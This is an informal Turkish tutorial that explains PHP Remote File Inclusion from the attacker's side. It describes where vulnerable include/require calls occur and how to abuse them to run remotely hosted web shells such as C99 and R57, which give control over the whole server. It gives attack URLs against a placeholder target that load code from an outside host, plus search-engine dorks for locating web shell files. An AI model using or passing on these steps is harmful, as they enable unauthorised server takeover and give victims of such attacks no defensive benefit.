-RFİ(Remote File İnclusion) Nedir?
RFİ php dilinde yazılmış sistemlerde bulanabilen bir Güvenlik açığıdır..
Aslında artık RFİ biraz eskide kaldı RFİ açığı bulunan siteler çok az kaldı bugünlerde…
RFİ ‘nin sözlük anlamı ise uzaktan dosya dahil etmektir.
2-Neden Kaynaklanır?
Php scriptlerde dikkatsiz Coderlerin yaptığı kodlama hatalarından kaynaklanır..
3-Nasıl Faydalanılır?
Geçelim Nasıl Faydalanacağımıza….Php dilinde “include”kodu ile dosyanın yolu gösterilir.
Peki Biz napıcaz?Bu yolu kullanarak kendi istediği dosyayı Çalıştırıcaz.
Ama Nasıl?
Eğer server üzerinde dizinleri görebilen ve servere dosya upload yükleyebilen bir dosya çalıştırırsak sadece açık bulunan siteye değil tüm servere hakim olabiliriz…
Bu dosyalara Listpath denir..Örnek Listpath:C99,R57 vs.
4-Nerelerde Bulunur?
Rfi sadece ve sadece php dilinde yazılmış sistemlerde bulunur..Php’de kullanılan şu komutlar bizim için çok önemli bunlar:include,include_once,require ve require_once..
Lakin Rfi bu kodların olduğu yerde bulunmaktadır.
-Şimdi küçük bir uygulama gösterelim..
include($code);in /admin/b3r4t.php
Şimdi burada $ sonraki kısım çok önemli…Zira dosya çalıştırma yolu code oluyor. Eğer yukarıdaki kodlama yapılırken $path_to_folder=”./” gibi vs bir kod eklenmez ise çağrılmak istenen dosya sadece code ile sınırlı kalmaz ve biz istediğimiz dosyayı çağırırız..Burada devreye Listpathler giriyor..Listpathleri yukarıda anlatmıştık..
Ve açık şöyle yazılır:
www.hedef.com/admin/b3r4t.php?code= http://[listpath adresi]?
Daha karmaşık bir şey deneyelim:
include($relight_pwl_org . 'config.php'); in html/contact/forum/index.php
www.hedef.com/html/contact/forum/index.php? relight_pwl_org=
http://[listpath adresi]?
Ha unutmadan bir de Listpathleri nasıl bulacağınızı söyleyeyim aslında çok rahat bulunursunuz ama neyse.
allinurl:c99.txt
allinurl:r57.txt
Bu dorkları arama motorlarında aratırsanız ulaşırsınız listpathlere…